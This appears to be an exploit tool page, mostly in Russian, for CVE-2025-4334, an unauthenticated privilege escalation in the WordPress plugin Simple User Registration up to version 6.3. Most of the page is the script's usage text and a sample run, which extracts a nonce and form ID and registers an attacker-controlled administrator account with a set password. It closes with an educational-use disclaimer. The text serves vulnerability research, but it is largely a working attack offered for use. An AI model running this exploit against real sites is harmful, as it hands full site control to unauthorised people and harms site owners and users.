
Simple User Registration <= 6.3 - Неаутентифицированное повышение привилегий
Плагин Simple User Registration для WordPress уязвим к повышению привилегий во всех версиях до 6.3 включительно.
Это связано с недостаточными ограничениями на значения мета-данных пользователя, которые могут быть указаны при регистрации.
Это позволяет неавторизованным злоумышленникам регистрироваться в качестве администратора.
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:HЭксплойт автоматизирует повышение привилегий через отправку формы с использованием извлеченного nonce, ID формы и referer.
python CVE-2025-4334.py -h
usage: CVE-2025-4334.py [-h] -u URL --form FORM
Simple User Registration <= 6.3 - Unauthenticated Privilege Escalation - by Khaled Alenazi (Nxploited)
options:
-h, --help show this help message and exit
-u, --url URL Base WordPress URL (e.g. http://localhost/wordpress/)
--form FORM Full URL of the page that contains the registration form
-u → Базовая установка WordPress (например, http://localhost/wordpress/)--form → Полный URL страницы с уязвимой формой регистрации (например, http://localhost/wpr/default-registration/)python CVE-2025-4334.py -u http://localhost/wordpress/ --form http://localhost/wpr/default-registration/
[i] Extracted Nonce : ffcf0140a8
[i] Extracted Form ID : 76
[i] Referer Path : /wpr/default-registration/
[i] HTTP Response Code : 200
[i] Server Response : {"user_id":13,"status":"success","signup":"signup","message":"Registration Done !\r\nUser Register Email not sent, please contact admin","redirect_url_signup":null}
[+] Exploitation Successful
[+] Username : Nxploitedadmin
[+] First Name : Nxploitedadmin
[+] Last Name : Nxploitedadmin
[+] Email : [email protected]
[+] Password : nxp1234
[+] Role : administrator
Exploit By : Khaled_alenazi (Nxploited)
Этот скрипт предоставляется только для образовательных и исследовательских целей.
Автор не несет ответственности за любое неправомерное использование или ущерб, причиненный этим инструментом.
Автор: Khaled_alenazi (Nxploited)